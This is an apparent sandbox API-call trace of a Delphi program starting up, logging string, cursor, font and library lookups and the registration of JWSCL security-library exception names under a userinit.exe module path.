[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff17, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff16, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff15, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff14, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0180.479] LoadStringA (in: hInstance=0x27d0000, uID=0xff13, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0180.480] LoadStringA (in: hInstance=0x27d0000, uID=0xff12, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0180.480] LoadStringA (in: hInstance=0x27d0000, uID=0xff11, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0180.480] LoadStringA (in: hInstance=0x27d0000, uID=0xff10, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0180.480] LoadStringA (in: hInstance=0x27d0000, uID=0xff2f, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0180.480] LoadStringA (in: hInstance=0x27d0000, uID=0xff2e, lpBuffer=0x6f4f0, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0180.480] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0180.480] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0180.480] GetVersion () returned 0x1db10106
[0180.480] GetCurrentProcessId () returned 0x1c0
[0180.480] GlobalAddAtomA (lpString="Delphi000001C0") returned 0xc102
[0180.480] GetCurrentThreadId () returned 0x414
[0180.480] GlobalAddAtomA (lpString="ControlOfs027D000000000414") returned 0xc0fc
[0180.480] RegisterClipboardFormatA (lpszFormat="ControlOfs027D000000000414") returned 0xc185
[0180.480] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0180.480] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0180.480] GetSystemMetrics (nIndex=19) returned 1
[0180.480] GetSystemMetrics (nIndex=75) returned 1
[0180.480] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x28f1320, fWinIni=0x0 | out: pvParam=0x28f1320) returned 1
[0180.480] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0180.480] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0180.480] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ff9) returned 0xc01a9
[0180.481] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0180.481] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0180.481] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ffa) returned 0x11022d
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ffb) returned 0xe0229
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ffc) returned 0xf021d
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ffd) returned 0xf0219
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7fff) returned 0x100217
[0180.481] LoadCursorA (hInstance=0x27d0000, lpCursorName=0x7ffe) returned 0xf0215
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0180.482] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0180.482] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0180.482] GetDC (hWnd=0x0) returned 0xed010836
[0180.482] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0180.482] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0180.482] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0180.482] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2829a60, dwData=0x28f156c) returned 1
[0180.482] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x6f85b, fWinIni=0x0 | out: pvParam=0x6f85b) returned 1
[0180.482] CreateFontIndirectA (lplf=0x6f85b) returned 0x280a085c
[0180.482] GetObjectA (in: h=0x280a085c, c=60, pv=0x6f64c | out: pv=0x6f64c) returned 60
[0180.482] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x6f707, fWinIni=0x0 | out: pvParam=0x6f707) returned 1
[0180.483] CreateFontIndirectA (lplf=0x6f7e3) returned 0x6b0a0861
[0180.483] GetObjectA (in: h=0x6b0a0861, c=60, pv=0x6f64c | out: pv=0x6f64c) returned 60
[0180.483] CreateFontIndirectA (lplf=0x6f7a7) returned 0x270a089a
[0180.483] GetObjectA (in: h=0x270a089a, c=60, pv=0x6f64c | out: pv=0x6f64c) returned 60
[0180.483] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0180.483] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6f7bb, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0180.483] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x6f7bb | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0180.483] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x4e0000
[0180.483] GetKeyboardLayoutList (in: nBuff=64, lpList=0x6f73c | out: lpList=0x6f73c) returned 1
[0180.484] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0180.484] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0180.485] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0180.485] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0180.486] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0180.486] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0180.486] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0180.486] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0180.486] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0180.486] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0180.486] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0180.487] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0180.487] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0180.487] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0180.487] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0180.487] LoadStringA (in: hInstance=0x27d0000, uID=0xff59, lpBuffer=0x6f49c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0180.487] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0180.487] LoadStringA (in: hInstance=0x27d0000, uID=0xff5a, lpBuffer=0x6f49c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0180.487] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0180.487] LoadStringA (in: hInstance=0x27d0000, uID=0xff5b, lpBuffer=0x6f49c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0180.487] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0180.487] LoadStringA (in: hInstance=0x27d0000, uID=0xff5c, lpBuffer=0x6f49c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0180.487] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0180.487] SetErrorMode (uMode=0x8000) returned 0x1
[0180.487] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d770000
[0180.489] SetErrorMode (uMode=0x1) returned 0x8000
[0180.489] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePropertyFrame") returned 0x6d7720ea
[0180.490] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreateFontIndirect") returned 0x6d7720b7
[0180.490] GetProcAddress (hModule=0x6d770000, lpProcName="OleCreatePictureIndirect") returned 0x6d7720c8
[0180.490] GetProcAddress (hModule=0x6d770000, lpProcName="OleLoadPicture") returned 0x6d7720d9
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x28bfa98*="EJwsclUnsupportedException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x28bfa80*="EJwsclPIDException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x28bfa68*="EJwsclJwShellExecuteException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x28bfa50*="EJwsclShellExecuteException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x28bfa38*="EJwsclElevationException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x28bfa20*="EJwsclAbortException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x28bfa08*="EJwsclSuRunErrorException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bf9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x28bf9f0*="EJwsclElevateProcessException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bf9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x28bf9d8*="EJwsclCertApiException") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bf9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x28bf9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bf9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x28bf9a8*="EJwsclInvalidStartupInfo") returned 1
[0180.490] SysReAllocStringLen (in: pbstr=0x28bf990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x28bf990*="EJwsclFirewallNoExceptionsException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x28bf978*="EJwsclFirewallInactiveException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x28bf960*="EJwsclFirewallDelRuleException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x28bf948*="EJwsclAddUdpPortToFirewallException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x28bf930*="EJwsclAddTcpPortToFirewallException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x28bf918*="EJwsclFirewallAddRuleException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28bf900*="EJwsclSetRemoteAdminAdressException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28bf8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28bf8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28bf8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28bf8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28bf888*="EJwsclGetIncomingPingAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28bf870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28bf858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x28bf840*="EJwsclGetFWStateException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x28bf828*="EJwsclSetFWStateException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x28bf810*="EJwsclFirewallProfileInitException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x28bf7f8*="EJwsclFirewallInitException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x28bf7e0*="EJwsclGenericFirewallException") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x28bf7c8*="EJwsclEnumerateProcessFailed") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x28bf7b0*="EJwsclInvalidRegistryPath") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x28bf798*="EJwsclEndOfStream") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x28bf780*="EJwsclClassTypeMismatch") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x28bf768*="EJwsclInvalidHandle") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x28bf750*="EJwsclInvalidIndex") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x28bf738*="EJwsclInvalidSession") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x28bf720*="EJwsclMissingEvent") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x28bf708*="EJwsclInvalidPointerType") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x28bf6f0*="EJwsclCreateProcessFailed") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x28bf6d8*="EJwsclNilPointer") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x28bf6c0*="EJwsclUnimplemented") returned 1
[0180.491] SysReAllocStringLen (in: pbstr=0x28bf6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x28bf6a8*="EJwsclInitWellKnownException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x28bf690*="EJwsclKeyApiException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x28bf678*="EJwsclKeyException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x28bf660*="EJwsclHashApiException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x28bf648*="EJwsclHashException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x28bf630*="EJwsclCSPApiException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x28bf618*="EJwsclCSPException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x28bf600*="EJwsclTerminalSessionException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x28bf5e8*="EJwsclTerminalServiceNecessary") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x28bf5d0*="EJwsclTerminalServiceException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x28bf5b8*="EJwsclTerminalServerConnectException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x28bf5a0*="EJwsclTerminalServerException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x28bf588*="EJwsclCryptUnsupportedException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x28bf570*="EJwsclCryptApiException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x28bf558*="EJwsclCryptException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x28bf540*="EJwsclOSError") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x28bf528*="EJwsclResourceInitFailed") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x28bf510*="EJwsclResourceUnequalCount") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x28bf4f8*="EJwsclResourceNotFound") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x28bf4e0*="EJwsclResourceException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x28bf4c8*="EJwsclFailedAddACE") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x28bf4b0*="EJwsclUnsupportedACE") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x28bf498*="EJwsclOpenWindowStationException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x28bf480*="EJwsclWindowStationException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x28bf468*="EJwsclCloseDesktopException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x28bf450*="EJwsclCreateDesktopException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x28bf438*="EJwsclOpenDesktopException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x28bf420*="EJwsclDesktopException") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x28bf408*="EJwsclSACLAccessDenied") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x28bf3f0*="EJwsclAccessDenied") returned 1
[0180.492] SysReAllocStringLen (in: pbstr=0x28bf3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x28bf3d8*="EJwsclLSAException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x28bf3c0*="ESetOwnerException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x28bf3a8*="ESetSecurityException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x28bf390*="EJwsclInvalidParentDescriptor") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x28bf378*="EJwsclInvalidKeyPath") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x28bf360*="EJwsclInvalidGenericAccessMask") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x28bf348*="EJwsclAdaptSecurityInfoException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x28bf330*="EJwsclThreadException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x28bf318*="EJwsclInvalidObjectException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x28bf300*="EJwsclSecurityObjectException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x28bf2e8*="EJwsclHashMismatch") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x28bf2d0*="EJwsclStreamHashException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x28bf2b8*="EJwsclStreamInvalidMagicException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x28bf2a0*="EJwsclStreamSizeException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x28bf288*="EJwsclStreamException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x28bf270*="EJwsclNoSuchLogonSession") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x28bf258*="EJwsclInvalidFlagsException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x28bf240*="EJwsclProcessNotFound") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x28bf228*="EJwsclInvalidParameterException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x28bf210*="EJwsclInvalidPathException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x28bf1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x28bf1e0*="EJwsclInvalidRevision") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x28bf1c8*="EJwsclInvalidAceMismatch") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x28bf1b0*="EJwsclRevisionMismatchException") returned 1
[0180.493] SysReAllocStringLen (in: pbstr=0x28bf198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x28bf198*="EJwsclInvalidACEException") returned 1
